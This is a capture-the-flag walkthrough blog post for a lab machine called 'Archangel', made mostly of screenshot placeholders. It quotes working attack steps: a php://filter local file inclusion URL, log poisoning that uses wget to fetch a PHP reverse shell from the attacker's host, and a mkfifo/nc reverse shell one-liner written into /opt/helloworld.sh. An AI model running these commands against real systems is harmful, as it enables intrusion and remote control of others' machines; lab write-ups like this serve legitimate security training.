Post

Archangel

Archangel

Pasted image 20260526133407.png Pasted image 20260526141203.png ๐Ÿ’ป You can see the email points to a domain, so I added it to my hosts file: Pasted image 20260526141313.png 10.48.165.142 mafialive.thm Pasted image 20260526141355.png Pasted image 20260528204101.png Pasted image 20260528204120.png Pasted image 20260528204154.png

๐Ÿ” I used this filter to view local files:

1
http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

Pasted image 20260528204959.png Pasted image 20260528205011.png Pasted image 20260528210140.png Pasted image 20260528210229.png

๐ŸŽฏ I tried a basic shell reverse payload, but it didnโ€™t work, so I decided to upload a PHP reverse shell: Pasted image 20260528210756.png I created a reverse shell file (re.php) and fetched it using wget:

1
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=wget%20http://10.48.84.210:8000/re.php

Pasted image 20260528210933.png Pasted image 20260528210952.png Pasted image 20260528211051.png

โšก Stabilize the shell:

1
2
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

Pasted image 20260528211908.png

๐Ÿ’ก Use this to edit the bash file so we can get the reverse shell:

1
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.48.84.210 4445 >/tmp/f' > /opt/helloworld.sh

Pasted image 20260528212306.png Pasted image 20260528213509.png Pasted image 20260528213729.png

๐Ÿ“Œ I couldnโ€™t get a connection back, so I opened a Python server to transfer the file locally: Pasted image 20260528213807.png

Pasted image 20260528214102.png Pasted image 20260528214738.png Pasted image 20260528214923.png

This post is licensed under CC BY 4.0 by the author.